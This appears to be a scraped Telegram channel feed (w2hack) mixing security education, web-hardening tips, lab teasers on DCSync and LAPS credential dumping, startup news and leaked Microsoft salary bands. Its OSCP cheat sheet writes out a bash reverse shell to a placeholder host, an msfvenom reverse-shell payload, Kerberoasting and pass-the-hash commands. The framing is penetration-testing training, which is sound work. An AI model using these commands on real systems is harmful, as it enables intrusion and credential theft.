Сохраняя энергию стартапа. Как техногиганты ежедневно изобретают будущее и остаются на вершине, Алекс Кантровиц, 2022
Большинство компаний, определившись со своими преимуществами, зацикливаются на их совершенствовании, но забывают при этом, что их взгляд обращен в прошлое, а не в будущее. Amazon и другие технологические гиганты (такие как Facebook, Google и Microsoft) всегда работают так, будто каждый день – первый: эти лидеры рынка тратят свое время на переосмысление своих продуктов, а не на то, чтобы бесконечно их улучшать.
Благодаря 130 интервью, проведенным с сотрудниками ведущих IT-компаний, автор этой книги раскрывает секрет успеха технологических гигантов в деловом мире, где нет никаких гарантий, только риск и конкуренция.
#book #startup
Большинство компаний, определившись со своими преимуществами, зацикливаются на их совершенствовании, но забывают при этом, что их взгляд обращен в прошлое, а не в будущее. Amazon и другие технологические гиганты (такие как Facebook, Google и Microsoft) всегда работают так, будто каждый день – первый: эти лидеры рынка тратят свое время на переосмысление своих продуктов, а не на то, чтобы бесконечно их улучшать.
Благодаря 130 интервью, проведенным с сотрудниками ведущих IT-компаний, автор этой книги раскрывает секрет успеха технологических гигантов в деловом мире, где нет никаких гарантий, только риск и конкуренция.
#book #startup
👍5🔥1
Kantrovic_A._Sohranyaya_Yenergiyu_Star.fb2
1.9 MB
Сохраняя энергию стартапа. Как техногиганты ежедневно изобретают будущее и остаются на вершине, Алекс Кантровиц, 2022
🔥3👍2❤1😁1
This media is not supported in your browser
VIEW IN TELEGRAM
🌟 Друзья, кто хочет поддержать бустами @w2hack - голосуйте по ссылке ниже! 📩
Нам не хватает всего
Розыгрыш Telegram Premium опять может привести к наплыву ботов и фейковых аккаунтов. Ваш вклад будет очень ценен!
🥰 Boost for w2hack 🌟
1010111 1101000 1101001 1110100 1100101 110010 1101000 1100001 1100011 1101011
#info
Нам не хватает всего
20 голосов (4 человека, кто может забустить) для возможности публикации сторис!Розыгрыш Telegram Premium опять может привести к наплыву ботов и фейковых аккаунтов. Ваш вклад будет очень ценен!
1010111 1101000 1101001 1110100 1100101 110010 1101000 1100001 1100011 1101011
#info
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👎4❤3👍2❤🔥1
Форсируем опции безопасности для web серверов на базе Apache и nginx
CORS, CSP, HTTPS и HSTS - это важные компоненты безопасности веб-сайтов. Они работают вместе для защиты данных и предотвращения различных видов атак.
🚨 CORS (Cross-Origin Resource Sharing):
Позволяет контролировать, какие ресурсы на сервере могут быть доступны из разных доменов.
Используется для безопасного обмена данными между разными доменами.
По умолчанию браузеры блокируют междоменные запросы, но CORS позволяет серверам разрешать определенные запросы.
🚨 CSP (Content Security Policy):
Помогает предотвратить атаки, такие как межсайтовый скриптинг (XSS).
Определяет, какие ресурсы (скрипты, стили, изображения и т. д.) браузеру разрешено загружать.
Настраивается через заголовок HTTP Content-Security-Policy.
🚨 HTTPS (Hypertext Transfer Protocol Secure):
Обеспечивает безопасное соединение между браузером и сервером.
Использует шифрование для защиты передаваемых данных.
Необходим для защиты конфиденциальной информации, такой как пароли и данные кредитных карт.
🚨 HSTS (HTTP Strict Transport Security):
Указывает браузеру всегда использовать HTTPS при доступе к сайту.
Предотвращает атаки, такие как downgrade (понижение) соединения до HTTP.
Настраивается через заголовок HTTP Strict-Transport-Security.
💡Дополнительно:
Хабр + Хабр2 + OWASP Cheat Sheet
🔽 Пример настройки опций ИБ для указанных веб северов смотри в файле ниже ⬇️ ⬇️ ⬇️
#web #hardering
CORS, CSP, HTTPS и HSTS - это важные компоненты безопасности веб-сайтов. Они работают вместе для защиты данных и предотвращения различных видов атак.
Позволяет контролировать, какие ресурсы на сервере могут быть доступны из разных доменов.
Используется для безопасного обмена данными между разными доменами.
По умолчанию браузеры блокируют междоменные запросы, но CORS позволяет серверам разрешать определенные запросы.
Помогает предотвратить атаки, такие как межсайтовый скриптинг (XSS).
Определяет, какие ресурсы (скрипты, стили, изображения и т. д.) браузеру разрешено загружать.
Настраивается через заголовок HTTP Content-Security-Policy.
Обеспечивает безопасное соединение между браузером и сервером.
Использует шифрование для защиты передаваемых данных.
Необходим для защиты конфиденциальной информации, такой как пароли и данные кредитных карт.
Указывает браузеру всегда использовать HTTPS при доступе к сайту.
Предотвращает атаки, такие как downgrade (понижение) соединения до HTTP.
Настраивается через заголовок HTTP Strict-Transport-Security.
💡Дополнительно:
Хабр + Хабр2 + OWASP Cheat Sheet
#web #hardering
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7❤2👍1
Sec_Tweak_Web_CORS_CSP_HTTPS_HSTS_Apache_nginx_[w2hack]!.pdf
8.4 MB
Форсируем опции безопасности для web серверов на базе Apache и nginx
👍3❤1🙈1
Credential Dumping: DCSync Attack
Active Directory Credential Dumping DCSync Attack is a specialized technique used by attackers to extract credentials from a domain controller (DC) by simulating the behavior of a domain controller itself.
🛠 Setting up a lab environment to simulate the attack
📚 Understanding the DRS protocol and how the attack works
🔍 Why such misconfigurations occur in real-world scenarios
💣 Exploiting the misconfiguration
🗺 Mapping the attack to MITRE ATT&CK
👁 Detecting the attack
🛡 Mitigation strategies
👁 Lab Setup
Requirements:
• A virtualized environment (e.g., VMware, VirtualBox, or Hyper-V).
• Windows Server configured as a Domain Controller.
• A Windows client machine.
• Tools: Impacket, Mimikatz, Netexec, and Metasploit.
🛠 Steps:
Domain Controller Configuraon:
• Install and configure Windows Server as a DC where domain name is ignite.local and IP is defined as stac 192.168.1.48.
• Set up Acve Directory (AD) with a few users and groups.
#windows
Active Directory Credential Dumping DCSync Attack is a specialized technique used by attackers to extract credentials from a domain controller (DC) by simulating the behavior of a domain controller itself.
🛠 Setting up a lab environment to simulate the attack
📚 Understanding the DRS protocol and how the attack works
🔍 Why such misconfigurations occur in real-world scenarios
💣 Exploiting the misconfiguration
🗺 Mapping the attack to MITRE ATT&CK
👁 Detecting the attack
🛡 Mitigation strategies
👁 Lab Setup
Requirements:
• A virtualized environment (e.g., VMware, VirtualBox, or Hyper-V).
• Windows Server configured as a Domain Controller.
• A Windows client machine.
• Tools: Impacket, Mimikatz, Netexec, and Metasploit.
🛠 Steps:
Domain Controller Configuraon:
• Install and configure Windows Server as a DC where domain name is ignite.local and IP is defined as stac 192.168.1.48.
• Set up Acve Directory (AD) with a few users and groups.
#windows
1🔥5🙈2❤1👍1👏1
Credential Dumping LAPS
In this arcle, we will be discussing the concept of Credential Dumping and LAPS (Local Administrator Password Solution). We will delve into the world of password management and explore how LAPS can help migate the risks associated with using shared local accounts and passwords across a domain. With the increasing threat of cyber attack's, it's essential to understand the importance of secure password management and how LAPS can help streamline this process.
The Local Administrator Password Solution (LAPS) is a tool designed to manage local account passwords for computers joined to a domain. It securely stores these passwords in Acve Directory (AD) and protects them using Access Control Lists (ACLs). Consequently, only authorized users can access or reset them.
In setups where users must log into computers without domain credentials, managing passwords can become challenging and heighten the risk of Pass-the-Hash (PtH) atacks. Therefore, LAPS addresses the problem of using a shared local account with the same password across all computers in a domain. It assigns a unique, randomly generated password to the local administrator account on each machine. As a result, domain administrators can control which users, such as helpdesk staff, can view these passwords.
#windows
In this arcle, we will be discussing the concept of Credential Dumping and LAPS (Local Administrator Password Solution). We will delve into the world of password management and explore how LAPS can help migate the risks associated with using shared local accounts and passwords across a domain. With the increasing threat of cyber attack's, it's essential to understand the importance of secure password management and how LAPS can help streamline this process.
The Local Administrator Password Solution (LAPS) is a tool designed to manage local account passwords for computers joined to a domain. It securely stores these passwords in Acve Directory (AD) and protects them using Access Control Lists (ACLs). Consequently, only authorized users can access or reset them.
In setups where users must log into computers without domain credentials, managing passwords can become challenging and heighten the risk of Pass-the-Hash (PtH) atacks. Therefore, LAPS addresses the problem of using a shared local account with the same password across all computers in a domain. It assigns a unique, randomly generated password to the local administrator account on each machine. As a result, domain administrators can control which users, such as helpdesk staff, can view these passwords.
#windows
❤🔥4🙈2
OSCP Cheat Sheet: Your Ultimate Penetration Testing Guide for Windows and Linux
Preparing for the OSCP exam or diving into penetration testing? Here’s a quick rundown of essential tools, commands, and techniques to help you succeed!
🔍 Recon & Enumeration
Nmap: nmap -sV -p- <IP> (Full scan)
SMB: crackmapexec smb <IP> -u user -p pass --shares
HTTP: gobuster dir -u http://<IP> -w wordlist.txt
⚡️ Exploitation
Reverse Shells:
Bash: bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
MSFVenom: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
Privilege Escalation:
Windows: Check winpeas.exe or powerup.ps1
Linux: sudo -l or find / -perm -u=s -type f 2>/dev/null
🔑 Password Cracking
John: john --wordlist=rockyou.txt hash
Hashcat: hashcat -m 1000 hash.txt wordlist.txt
🛠 Active Directory
Kerberoasting: impacket-GetUserSPNs -dc-ip <DC-IP> domain/user:pass -request
Pass-the-Hash: psexec.[py]-hashes LM:NTLM user@target
📌 Pro Tips:
Always check /etc/passwd, registry keys, and scheduled tasks for privesc paths.
Use tools like BloodHound for AD mapping and Mimikatz for credential dumping.
1010111 1101000 1101001 1110100 1100101 110010 1101000 1100001 1100011 1101011
#pentest #exam
Preparing for the OSCP exam or diving into penetration testing? Here’s a quick rundown of essential tools, commands, and techniques to help you succeed!
🔍 Recon & Enumeration
Nmap: nmap -sV -p- <IP> (Full scan)
SMB: crackmapexec smb <IP> -u user -p pass --shares
HTTP: gobuster dir -u http://<IP> -w wordlist.txt
⚡️ Exploitation
Reverse Shells:
Bash: bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
MSFVenom: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
Privilege Escalation:
Windows: Check winpeas.exe or powerup.ps1
Linux: sudo -l or find / -perm -u=s -type f 2>/dev/null
🔑 Password Cracking
John: john --wordlist=rockyou.txt hash
Hashcat: hashcat -m 1000 hash.txt wordlist.txt
🛠 Active Directory
Kerberoasting: impacket-GetUserSPNs -dc-ip <DC-IP> domain/user:pass -request
Pass-the-Hash: psexec.[py]-hashes LM:NTLM user@target
📌 Pro Tips:
Always check /etc/passwd, registry keys, and scheduled tasks for privesc paths.
Use tools like BloodHound for AD mapping and Mimikatz for credential dumping.
1010111 1101000 1101001 1110100 1100101 110010 1101000 1100001 1100011 1101011
#pentest #exam
1❤🔥5🔥1
OSCP Cheat Sheet_Your Ultimate Penetration Testing Guide.pdf
1.5 MB
OSCP Cheat Sheet: Your Ultimate Penetration Testing Guide for Windows and Linux
🔥7❤🔥2❤1
Pentest award уже третий год отмечает талантливых специалистов, которые делают огромную работу по поиску уязвимостей, оставаясь за кадром.
Важен сам подход и идея, необычные ресерчи и методики. Приз за победу — фирменная именная статуэтка и макбук. За второе место — айфон, а за третье — смарт-часы.
#event
Please open Telegram to view this post
VIEW IN TELEGRAM
👎4👍3❤2🔥2🤝1
KrokIT — стартап-акселератор с корнями из Беларуси, созданный бизнес-инкубатором «С нами будущее». Цель — помочь стартапам быстро добиться успеха, снизить риски и повысить привлекательность для инвесторов.
🔝 Главная страница (FB + YT + LnkdIn)
#info #startup #world
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👎3🤔2
В сеть попали внутренние инструкции Microsoft по оплате труда технических специалистов, которые дают представление о реальных зарплатах и бонусах в одной из крупнейших ИТ-компаний.
В Microsoft действует система уровней (грейдов), отражающая должность и опыт сотрудника. Уровни 57–59 соответствуют джуниорам, уровень 63 считается отправной точкой для сеньоров, а с 65-го начинается «принципальный» (principal) уровень. Еще выше — партнеры (68) и признанные эксперты (distinguished, 70).
Например, инженер на самом высоком уровне 70 может получать до $408 000 в год (в зависимости от локации), а также получить разовую акционную премию при найме до $1,9 миллиона и ежегодные акции на сумму до $1,476 миллиона. Для новичков (уровень 57) «главный» диапазон зарплаты составляет от $83 000 до $108 000, а в городах с высоким уровнем жизни — от $95 800 до $124 600. При найме им также полагаются бонус и пакет акций.
❗️ Источник
#analytics #world
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯4❤2👍2